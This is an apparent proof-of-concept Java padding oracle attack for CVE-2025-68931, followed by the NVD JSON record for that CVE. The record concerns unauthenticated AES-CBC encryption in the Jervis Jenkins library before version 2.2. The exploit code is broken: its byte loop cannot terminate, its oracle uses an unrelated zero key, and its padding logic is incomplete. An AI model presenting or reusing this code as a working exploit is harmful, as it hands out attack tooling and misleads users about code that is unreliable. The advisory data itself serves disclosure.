CVE-2025-68931

import javax.crypto.Cipher; import javax.crypto.spec.IvParameterSpec; import javax.crypto.spec.SecretKeySpec; import java.nio.ByteBuffer; public class PaddingOraclePOC { public static void main(String[] args) throws Exception { byte[] key = "1234567890abcdef".getBytes(); // Example key byte[] iv = new byte[16]; byte[] ciphertext = hexToBytes("target_ciphertext_here"); // Padding Oracle Attack Simulation byte[] decrypted = new byte[0]; for (int block = ciphertext.length / 16 - 1; block >= 0; block--) { byte[] blockCiphertext = new byte[16]; System.arraycopy(ciphertext, block * 16, blockCiphertext, 0, 16); byte[] intermediate = new byte[16]; for (int i = 15; i >= 0; i--) { for (byte b = 0; b < 256; b++) { byte[] crafted = new byte[16]; System.arraycopy(blockCiphertext, 0, crafted, 0, 16); crafted[i] = b; // Check if padding is valid (oracle response) if (checkPaddingOracle(crafted)) { intermediate[i] = (byte)(b ^ (16 - i)); break; } } } byte[] previousBlock = block > 0 ? java.util.Arrays.copyOfRange(ciphertext, (block-1)*16, block*16) : iv; byte[] plaintextBlock = new byte[16]; for (int i = 0; i < 16; i++) { plaintextBlock[i] = (byte)(intermediate[i] ^ previousBlock[i]); } decrypted = concat(plaintextBlock, decrypted); } System.out.println("Decrypted: " + new String(decrypted)); } static boolean checkPaddingOracle(byte[] data) { // Simulate oracle check - in real attack, send to vulnerable endpoint try { Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding"); cipher.init(Cipher.DECRYPT_MODE, new SecretKeySpec(new byte[16], "AES"), new IvParameterSpec(new byte[16])); cipher.doFinal(data); return true; } catch (Exception e) { return false; } } static byte[] concat(byte[] a, byte[] b) { byte[] result = new byte[a.length + b.length]; System.arraycopy(a, 0, result, 0, a.length); System.arraycopy(b, 0, result, a.length, b.length); return result; } static byte[] hexToBytes(String hex) { int len = hex.length(); byte[] data = new byte[len / 2]; for (int i = 0; i < len; i += 2) { data[i / 2] = (byte)((Character.digit(hex.charAt(i), 16) << 4) + Character.digit(hex.charAt(i+1), 16)); } return data; } }

{"cve": {"id": "CVE-2025-68931", "sourceIdentifier": "[email protected]", "published": "2026-01-13T20:16:07.980", "lastModified": "2026-01-20T17:37:47.087", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Jervis is a library for Job DSL plugin scripts and shared Jenkins pipeline libraries. Prior to 2.2, AES/CBC/PKCS5Padding lacks authentication, making it vulnerable to padding oracle attacks and ciphertext manipulation. This vulnerability is fixed in 2.2."}, {"lang": "es", "value": "Jervis es una biblioteca para scripts del plugin Job DSL y bibliotecas compartidas de pipeline de Jenkins. Antes de la versión 2.2, AES/CBC/PKCS5Padding carece de autenticación, haciéndolo vulnerable a ataques de oráculo de relleno y manipulación de texto cifrado. Esta vulnerabilidad está corregida en la versión 2.2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-327"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:samrocketman:jervis:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.2", "matchCriteriaId": "F1205448-6074-4B8A-B941-572D3D44F9E1"}]}]}], "references": [{"url": "https://github.com/samrocketman/jervis/commit/c3981ff71de7b0f767dfe7b37a2372cb2a51974a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/samrocketman/jervis/security/advisories/GHSA-gxp5-mv27-vjcj", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}